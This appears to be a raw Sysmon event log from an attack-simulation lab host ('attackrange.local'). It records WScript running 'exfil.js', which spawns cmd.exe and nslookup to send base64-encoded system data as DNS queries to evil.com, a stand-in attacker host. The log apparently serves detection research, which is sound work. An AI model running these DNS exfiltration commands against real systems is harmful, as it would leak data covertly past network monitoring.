14:16:09.409{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195080Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.409{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195079Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.409{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195078Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.409{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17A9-629A-1B3E-000000005F02}1488C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000195077Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.409{2E1864BB-17A1-629A-783D-000000005F02}55523736C:\Windows\System32\WScript.exe{2E1864BB-17A9-629A-1B3E-000000005F02}1488C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000195076Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.410{2E1864BB-17A9-629A-1B3E-000000005F02}1488C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A KioqV2luMzJfTmV0d29ya0FkYXB0ZXJDb25maWd1cmF0aW9uKioq evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nllmpt.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000195075Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.407{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlrmhw.tmpMD5=05BA971AFDC62533F0A9B0611710936B,SHA256=CC7F6EF6FDFF1D48F32CBB164D99D5681824740D7C263CA1F614A2D5F388A371,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000195074Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.371{2E1864BB-17A9-629A-193E-000000005F02}68487876C:\Windows\system32\conhost.exe{2E1864BB-17A9-629A-1A3E-000000005F02}8016C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000195073Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.371{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A56B5135167AA99310416374BB238FFF,SHA256=0D1839F56D6EA1391D31231A683D8BB76135794F6A8A1F889D9CAE9424D85B9D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000195072Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.371{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A7F38B8D4458B371777EFC3EAAD9FF15,SHA256=19F8188C3D4FCA9E237725C39C45FBC5CC7C4AEB5C1267AEA60F82BCEB577B2E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000195071Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.356{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195070Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.356{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195069Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.356{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195068Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.356{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195067Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.356{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17A9-629A-1A3E-000000005F02}8016C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000195066Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.356{2E1864BB-17A9-629A-183E-000000005F02}56086512C:\Windows\system32\cmd.exe{2E1864BB-17A9-629A-1A3E-000000005F02}8016C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000195065Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.367{2E1864BB-17A9-629A-1A3E-000000005F02}8016C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17A9-629A-183E-000000005F02}5608C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlrmhw.tmp 2>&1 10341000x8000000000000000195064Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.340{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17A9-629A-193E-000000005F02}6848C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195063Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.340{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17A9-629A-193E-000000005F02}6848C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195062Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.324{2E1864BB-17A9-629A-193E-000000005F02}68487876C:\Windows\system32\conhost.exe{2E1864BB-17A9-629A-183E-000000005F02}5608C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195061Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.324{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17A9-629A-193E-000000005F02}6848C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000195060Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.308{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195059Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.308{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195058Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.308{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195057Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.308{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195056Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.308{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17A9-629A-183E-000000005F02}5608C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000195055Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.308{2E1864BB-17A1-629A-783D-000000005F02}55526044C:\Windows\System32\WScript.exe{2E1864BB-17A9-629A-183E-000000005F02}5608C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000195054Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.319{2E1864BB-17A9-629A-183E-000000005F02}5608C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlrmhw.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000195053Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.308{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlilt.tmpMD5=5DEA0472F77A6BF3961D4B745AA161B8,SHA256=60802D61581927EFE9566582D9B1AC54D5861CAF9DA1F25F5EA80365318A8915,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000195052Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.270{2E1864BB-17A9-629A-163E-000000005F02}48287556C:\Windows\system32\conhost.exe{2E1864BB-17A9-629A-173E-000000005F02}7316C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195051Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.255{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195050Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 